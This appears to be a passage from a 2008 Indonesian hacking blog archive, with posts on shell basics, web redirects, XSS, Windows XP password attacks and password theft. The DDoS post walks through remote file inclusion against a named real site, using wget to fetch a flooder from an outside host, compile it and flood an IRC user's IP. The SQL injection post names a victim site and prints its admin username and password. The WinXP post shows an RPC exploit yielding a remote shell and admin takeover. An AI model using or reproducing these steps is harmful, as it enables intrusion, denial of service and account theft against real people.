tanda >> berarti memasukkan suatu kejadian. Misalnya dari contoh diatas , perintah
$more coba.txt >> test.txt berarti
pertama kali yang dilakukan dengan perintah diatas ialah melihat isi file (more) dari coba.txt setelah itu hasil eksekusinya di masukkan (>>) ke test.txt. Tanda >> berarti tidak meng-overwrite isi file yang terdapat pada test.txt . Tetapi jika anda hanya menggunakan tanda > saja, maka isi file test.txt akan di hapus diganti dengan isi file coba.txt

$more coba.txt > test.txt
$cat test.txt
kalimat ini saya tulis dari coba.txt

Trik Shell:

* Untuk mencari file perintah yang digunakan locate

$locate nama_file
* Jika ingin reboot (harus menjadi root dulu) lewat shell ketikkan perintah

#/sbin/reboot

Untuk shutdown

#/sbin/shutdown -h now

atribut -h berarti halt dan shutdown dilaksanakan sekarang (now).
* Untuk menghapus layer ketikkan 'clear'

$clear # atau juga dapat dengan menekan ctrl+l

Kesimpulan
Perintah pada shell sebenarnya sangat mudah. Semua daftar perintah mudah dihafal. Contohnya ls berasal dari kata list, cp berasal dari kata copy. Namun untuk melihat argument (atribut) yang lengkap dapat anda ketikkan seperti di bawah ini.

$man nama_perintah

Contoh:

$man cp

Untuk keluar dari man ketik 'q'.
http://www.sony-ak.com/articles/1/dasar_dasar_shell.php
dikutip dari : www.google.com :P

DDOS

2008-01-31T00:43:00.001-08:00

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.defendersofmodan.net/index.php?name=PNphpBB2

2. Kemudian hapus/delete index.php?name=PNphpBB2 di url/browsing sehingga menjadi http://www.defendersofmodan.net

3. Masukkan bug ini di belakang situs tadi :

modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

4. Masukkan file inject ini di belakang nya lagi :

http://www.geocities.com/jambihackerlinkcrew/sql.htm

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/jambihackerlinkcrew/sql.htm?&cmd=pwd

Jangan lupa memasukkan command Unix di ujungnya

5. Masukkan file tembak.c ini di belakang nya lagi :

http://www.freewebs.com/jambihackerlink/tembak.c

Misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=wget http://www.freewebs.com/jambihackerlink/tembak.c -O /var/tmp/tembak.c

6. Kemudian Compile file tembak.c

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=gcc -o /var/tmp/jambihackerlink /var/tmp/tembak.c

7. Utk mendapatkan IP target, buka Mirc trus join salah satu canel di Dalnet. Arahkan mouse ke salah satu nickname di canel itu trus klik kanan lalu pilih Whois

misal nya

ce_sweet83 is ~cute_83@202.155.150.70 * ce_cute

Kemudian kita cari keberadaan IP tersebut, misal nya http://www.dnsstuff.com/tools/whois.ch?ip=202.155.150.70
Ternyata target nya menggunakan ISP : Indosat Internet Service Providers

8. Skrg kita serang dgn DDOS supaya target nya Disconnect dari Dalnet (ingat, bandwith kamu harus lebih besar utk melakukan DDOS).

misal nya http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink ip port

http://www.defendersofmodan.net/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://geocities.com/jambihackerlinkcrew/sql.htm?&cmd=/var/tmp/./jambihackerlink 202.155.150.70 22 atau 202.155.150.70 53

Tunggu beberapa saat....... otomatis target nya akan Disconnect dari Dalnet

copi dari jambihackerlink :P

Mengalihkan halaman pada Friendster

2008-01-30T23:06:00.000-08:00

Dan saya juga yakin banyak korban yang berjatuhan (perang kalee...). Jika Anda merupakan salah satu korbannya, itu bukanlah akhir riwayat dari account friendster Anda. Berikut tips yang dapat Anda ikuti untuk menghapus testimonial usil tersebut.

1. Login ke account Friendster Anda (yang mendapatkan testimonial usil tentunya).

2. Setelah masuk ke Home Anda, akan nampak link New Testimonials, jangan diklik dulu.

3. Disable Java dan JavaScript pada browser Anda. Tiap browser memiliki option tersendiri untuk melakukan hal ini. Contoh pada Mozilla Firefox :
- klik Tool > Preferences (Windows) atau Edit > Preferences (Linux)
- klik Content
- uncheck Enable Java dan Enable JavaScript
Lakukan hal ini setelah Anda Log in, karena jika ini dilakukan sebelum Log in, Anda tidak akan bisa Log in.

4. Setelah Java dan JavaScript di disable, klik New Testimonials, untuk masuk ke halaman Pending Testimonials Anda. Untuk membedakan Testimonial usil dan biasa, lihat saja dari source code, (pada Firefox, tekan Ctrl+U, atau klik View > Page Source). Testimonial usil akan memiliki source seperti berikut :
<script>window.location="http://xxx.injeksi.com";</script>

5.Delete lah testimonial tersebut.

6. Enable kan kembali Java dan JavaScript, agar Anda bisa surfing dan Logout dengan sukses.

Demikian, semoga bisa membantu bagi yang membutuhkan.

Salam Hacker Indonesia /no1

Tekhnik Exploit Password WinXP

2008-01-30T22:57:00.001-08:00

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...
Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....
Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...
Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...

-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------
Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.
Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...
C:\Documents and Settings\Al-k>net user
User accounts for \\NOMATTER
-------------------------------------------------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.
// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada
D:\Data+ku_>
Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
________________________________________________
[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User.

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.

Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/
, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (

// Refferensi :
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink
// Greetz :
- y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned

Free Hosting & Domain

2008-01-30T22:55:00.000-08:00

1. Buat domain di http://co.cc
2. Semisal nama web anda adalah lenk maka nanti domain anda
akanberupa http://www.kuyaninja.co.cc yang ini Bisa Di
Redirect to di bikin DNS Gto
3. Pas Beres... edit alamat web nya lalu pilih DNS Seting jangan
yang
redirect.. nga asik
4. Laluu Di suruh masukan DNS nya...
5. Masukan dns1.000webhost.com ama dns2.000webhost.com
8. Buka tab baru atau browser baru.
9. Arahkan browser ke web http://www.000webhost.com/?id=15184
10. Itu adalah hostingan gratis yang memberikan cpanel untuk urusan
hostingan. Jadi seperti kita membeli hostingan berbayar (dapat 250mb
free space dan 100GB bandwith)
11. Daftar disana dan ikuti petunjuknya dengan klik link "order now"
12. Pada isian order now, masukan domain yang telah anda pilih di
co.cc. saya pakai kuyaninja.co.cc
sebagai contoh. maka
kita lihat ada 2
box paling atas di "I want to host my own domain". Pada box kiri,
masukkan kuyaninja dan pada box kecil disebelah kanan, masukkan co.cc
13. Isian lainnya silahkan diisi sesuai dengan keinginan
14. Saat udah selesai proses order dan anda bisa login ke
http://000webhost.com/members
15. Masukkan username dan password, maka akan muncul halaman account
anda
16. Klik "manage account" di sebelah kanan
17. Maka akan keluar domain anda dalam hal ini
http://kuyaninja.co.cc
dan klik "view account details"
22. Silahkan menunggu kira2 2X24 jam untuk melakukan sinkronisasi.
Jika anda mempunyai domain .com .net .org dan lainnya, waktu yang
dibutuhkan untuk sinkronisasi kira-kira 5 menit.
23. Setelah sinkronisasi selesai, anda bisa mengakses cpanel melalui
http://000webhost.com/members dengan klik "manage account" dan lihat
username yang diberikan. Kemudian klik "access cpanel" dan gunakan
username yang ditentukan dan password yang telah anda tentukan waktu
mendaftar.
24. Selamat membuat website...

Sekian tutor simple dari saya :D

Cara Redirect Situs

2008-01-30T22:43:00.000-08:00

Karena satu dan lain hal kita ingin mengarahkan orang untuk membuka situs lain saat membuka situs kita. Istilah teknisnya redirect. Alasan tersebut bisa meliputi:
1. Ganti ke alamat baru. Jadi saat orang buka alamat lama otomatis masuk ke alamat baru
3. Digunakan untuk hasil proses suatu form Biar orang tidak dapat mengulang proses suatu form hanya dengan klik refresh maka hail proses tersebut diredirect ke halaman tertentu. Halaman terima kasih misalnya.

Ada beberapa cara melakukan Redirect halaman web. Pada prinsipnya semuanya mudah kok. Asal kita mau mempelajarinya. Cara tersebut antara lain:
1. Meta Refresh
2. Javascript

1. Meta Refresh
Put this code into your page that you want to redirect

second = berapa detik halaman ingin dialihkan. Misalnya 2
other_url = Halaman baru yang akan dikunjungi user

Taruh script tersebut diantara

Dalam beberapa kasus kadang sebuah browser tidak mau otomatis redirect ke situs yang kita inginkan. Untuk mengatasinya kamu bisa menambahkan alamat situs yang ingin dituju. Dengan kata lain orang harus klik link tersebut untuk menuju halaman yang dimaksud.
Berikut contohnya
----------------------------------------------------------------------------------

You'll be redirected after 2 seconds

Klik di sini. bila Anda tidak otomatis pindah ke halaman baru dalam waktu 2 menit

-----------------------------------------------------------------------------------

Jika ingin langsung redirect tanpa ada jeda waktu hanya perlu mengganti content="0;

2. Javascript

Dengan Java script kamu juga bisa membuat halaman yang otomatis redirect ke halaman tertentu. Berikut contohnya

Tanpa jeda waktu
--------------------------------------------------

You'll be redirected

If your browser doesn’t automatically redirect,
please

--------------------------------------------------------------------

Dengan jeda waktu
---------------------------

You'll be redirected after 2 seconds

If your browser doesn't automatically redirect,
please click here.

---------------------------------------------------------------------

Angka 2000 diartikan milisecond atau dapat diartikan 2 detik. Jika ingin men-set 10 tinggal menggantinya menjadi 10000.

Selamat Mencoba

SQL Injection pada X-Ice System V-1

2008-01-30T22:05:00.000-08:00

Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah... :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
:)

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini

Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'

[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8

Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya
:

-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

Shoutz to : B_scorpio ==> Salute sama perjuangannya menguasai dunia .... huehuehuehue bcanda

BAGAIMANA BUG XSS TERJADI

2008-01-28T19:57:00.001-08:00

Salah satu bug/ kelemahan pada website adalah XSS, bug ini memang sudah agak lama? Tapi masih saja ada web yang memilikinya. Bug XSS adalah suatu kelemahan yang terdapat pada website yang tidak dilengkapi dengan filter. untuk lebih jelasnya perhatikan contoh link dibawah ini:

http://xxx.com/?option=com_content=&id=60&ktg=xss_bug

coba perhatikan karakter setelah tanda tanya “?” pada link diatas, berikut penjelasannya:

option=com_content Option, adalah variabel yang isinya adalah com_content
& (maksudnya dan )
id=60 . Id variabel yang isinya adalah 60
ktg=xss_bug . ktg variabel yang isinya adalah xss_bug

Karakter setelah tanda tanya “?” dan sebelah kirinya samadengan “=” adalah nama variabel.( saya anggap anda sudah mengerti tentang variabel). Variabel ini bertugas menyampaikan keinginan (permintaan) user(pengunjung website) kepada Program (website tersebut). Variabel yang digunakan umumnya ada 2 macam:

Variabel Dalam Program
variabel yang berkerja dari dalam program (tidak muncul kepermukaan)

Variabel Luar Program
variabel yang berkerja di luar program (tapi masih berhubungan dengan dalam program)

variabel yang digunakan kali ini bisa dikategorikan variabel luar. Contohnya seperti variabel diatas tadi (option, id dan ktg).

variabel ktg menyimpan nilai xss_bug, variabel ini akan dikirim ke program karena akan diproses untuk memberikan permintaan user. (saya harap anda paham dengan keterangan ini, bila masih bingung coba perhatikan listing di bawah ini!).

<html>
<head>
<title> Contoh Bug XSS </title>
</head>
<body>

<form name="form1" action="" method="post">
<input type="text" name="q">
<input type="submit" name="kirim" value="kirim" >
</form>
<?php
if ($kirim)
{
echo $q;
}
?>
</body>
</html>

simpan script diatas dengan nama form.php kemudian jalankan pada browser yang sudah terpasang server php kemudian coba anda ketikan "<h1>XSS_BUG</h1>" (tanpa petik) kemudian klik tombol kirim. lihat bagaimana hasilnya!

kirim

Akan anda lihat hasil di browser menampilkan tulisan :

XSS_BUG

seperti inilah xss terjadi, xss terjadi karena program web tersebut tidak dilengkapi filter tag-tag html ataupun javascript. Lantas bagaimana menangani bug ini??

Tanpa basa-basi mari kita pelajari bagaimana cara menangani bug XSS dalam program web kita. Berdasarkan contoh diatas tadi , dapat saya simpulkan bahwa XSS terjadi karena program web tidak dilengkapi Filter Tags HTML ataupun Javascript. Jadi untuk menangani bug ini kita cukup memberikan filter pada program web kita.Caranya :

Dalam PHP sendiri terdapat beberapa fungsi untuk mengganti karakter, diantaranya terdapat: ereg_replace(), eregi_replace(), str_replace(), dll

Anda bisa menggunakan fungsi replce yang mana saja, kali ini saya akan memberikan contoh dengan menggunakan ereg_regplace()

<html>
<head>
<title> Contoh Bug XSS </title>
</head><body>
<form name="form1" action="" method="post">

<input type="text" name="q">
<input type="submit" name="kirim" value="kirim" >
</form>
<?php
if ($kirim)
{
$q=ereg_replace("<","&lt;",$q);
$q=ereg_replace(">","&gt;",$q);
echo $q;
}
?>
</body>
</html>

coba anda lakukan hal yang sama seperti tadi, ketikan <h1>XSS_BUG</h1> pada text box kemudian klik tombol kirim!

pada perubahan kali ini, bagaimana hasilnya?? Akan anda lihat hasilnya sebagai berikut :

<h1>XSS_BUG</h1>

ini artinya bug XSS tidak berhasil. Program telah mengganti string < menjadi < begitu juga > diganti oleh ">"

Karakter “<” (tanpa petik) dalam PHP dibaca sebagai karakter “<”
sedangkan karakter “<” oleh PHP akan dibaca tags HTML atau JavaScript

cara hackers mendapatkan password

2008-01-26T03:40:00.000-08:00

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para newbie yang terus saja bertanya-tanya.. “Bagaimana cara mendapatkan password email orang lain?” atau pertanyaan yang paling sering saya terima ialah.. “Bagaimana cara anda mendapatkan password saya?” :P

Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga account saat berada di tempat-tempat rawan.

Bagaimana Mendapatkannya?

Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan paling sering digunakan:

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling

[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai “penipuan” :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran seperti sang korban.

Social Engineering merupakan seni “memaksa” orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan anda. Tentu saja “pemaksaan” yang dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan, dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan manusia. sehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker melalui social engineering, maka bisa jadi anda sendirilah yang membukakan jalan masuk bagi sang attacker.

[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form password misalnya.

Ada cara aman untuk menghindari keyloger:

Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang keyloger) tidak akan mendapatkan password anda yang sebenarnya.
Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa? karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam clipboard.

[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar. Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal, karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi terekam oleh webserver palsu, yaitu milik sang pelaku.

[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff. Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data. Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump, sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa paket-paket data ini dan menampilkan password (dsniff) atau isi email (mailsnarf).

[5]. Password Cracking

“Hacking while sleeping.” itulah ungkapan yang biasa dipakai oleh orang-orang yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari - hari! Semua itu tergantung dari target, apakah sang target menggunakan password yang umum, password memiliki panjang karakter yang tidak biasa, atau password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan mengunakan Brutus, salah satu jenis software remote password cracker yang cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus password. Sedangkan brute - force attack bekerja dengan mencobakan semua kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama tergantung dari jenis spesifikasi komputernya dan panjang karakter passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses terhadap usaha login yang secara terus-menerus tidak berhasil.

Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri aplikasinya di halaman Member - spyrozone.tk.

[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?

Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa dengan mudah membuat semacam script Java Script yang disisipkan dalam email untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster. Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya memiliki tips untuk ini:

Jangan menggunakan browser Internet Explorer
Saat ingin membuka profil orang lain, jangan menggunakan Internet Explorer. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari account anda dan bersihkan semua cookies, baru kemudian bukalah profil Friendster tujuan.
Periksa Source CODEnya
Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah disana terdapat script asing atau kata-kata yang identik dengan pembajakan seperti :
“HACKED”, “DEFACED”, “OWNED”.. dll..
Jika ragu-ragu……. reject ajah..
LogOUT tiba-tiba.
Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan sendirinya dari account anda. Saat anda diminta memasukkan username dan password, lihat dulu addressbar anda! apakan anda sedang berada di situs yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Fenomena lain adalah, hingga saat artikel ini diterbitkan, ternyata masih banyak dijumpai para user yang tidak melakukan sign out setelah membuka accountnya. Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke account sang korban.

[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang peselancar bisa menjadi milik kita.

[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam beberapa hari (Contohnya spyrozone.tk nich.. hehehe ;) Nah, untuk situs yang seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs tersebut browser tidak perlu lagi melakukan download untuk kedua kalinya dari server sehingga setiap halaman situs yang telah anda buka sebelumnya akan terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date? Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut akan disimpan.

